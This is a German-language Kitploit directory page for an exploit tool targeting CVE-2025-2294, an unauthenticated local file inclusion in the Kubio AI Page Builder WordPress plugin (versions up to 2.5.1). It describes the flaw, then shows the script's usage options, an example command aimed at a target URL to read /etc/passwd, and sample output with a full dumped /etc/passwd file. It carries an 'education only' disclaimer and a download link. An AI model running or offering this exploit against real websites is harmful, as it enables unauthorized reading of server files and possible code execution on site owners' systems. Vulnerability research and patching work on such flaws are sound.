Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2294 — Kubio AI Page Builder <= 2.5.1 - Nicht authentifizierte lokale Dateieinbindung | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-2294
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-2294

CVE-2025-2294

Kubio AI Page Builder <= 2.5.1 - Nicht authentifizierte lokale Dateieinbindung

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 Kubio AI Page Builder <= 2.5.1 - Nicht authentifizierte lokale Dateieinbindung

📝 Beschreibung

Das Kubio AI Page Builder-Plugin für WordPress ist in allen Versionen bis einschließlich 2.5.1 anfällig für lokale Dateieinbindung über die Funktion kubio_hybrid_theme_load_template. Dadurch können nicht authentifizierte Angreifer beliebige Dateien auf dem Server einbinden und ausführen, was die Ausführung von beliebigem PHP-Code in diesen Dateien ermöglicht. Dies kann genutzt werden, um Zugriffskontrollen zu umgehen, vertrauliche Daten zu erlangen oder eine Codeausführung zu erreichen, wenn Bilder und andere „sichere“ Dateitypen hochgeladen und eingebunden werden können.

  • CVE: CVE-2025-2294
  • CVSS: 9.8 (Kritisch)
  • Öffentlich veröffentlicht: 27. März 2025
  • Zuletzt aktualisiert: 27. März 2025

💥 Exploit-Details

Dieses Skript nutzt die Schwachstelle im Kubio AI Page Builder-Plugin aus, um beliebige Dateien auf dem Server einzubinden und auszuführen. Der Exploit ermöglicht es nicht authentifizierten Angreifern, vertrauliche Dateien vom Server zu lesen.

⚙️ Anforderungen

  • Python 3.x
  • requests-Bibliothek

🚀 Verwendung

root@kitploit:~
usage: CVE-2025-2294.py [-h] -u URL [-f FILE]

Exploit for CVE-2025-2294 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion # By:Nxploited Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target base URL (e.g., https://example.com)
  -f FILE, --file FILE  File to read (default: /etc/passwd)

📋 Beispiel

root@kitploit:~
python3 CVE-2025-2294.py -u https://targetwebsite.com -f /etc/passwd

🔍 Ausgabe

root@kitploit:~
[+] Target is vulnerable. Exploiting...
[+] Exploit successful. File content:
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:992:992:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:102::/nonexistent:/usr/sbin/nologin
tss:x:101:104:TPM software stack,,,:/var/lib/tpm:/bin/false
strongswan:x:102:65534::/var/lib/strongswan:/usr/sbin/nologin
tcpdump:x:103:105::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:105:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin


⚠️ Haftungsausschluss

Dieser Exploit wird nur zu Bildungszwecken bereitgestellt. Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieses Tools. Nutzung auf eigene Gefahr.

Von: Nxploited | Khaled Alenazi

Tool herunterladen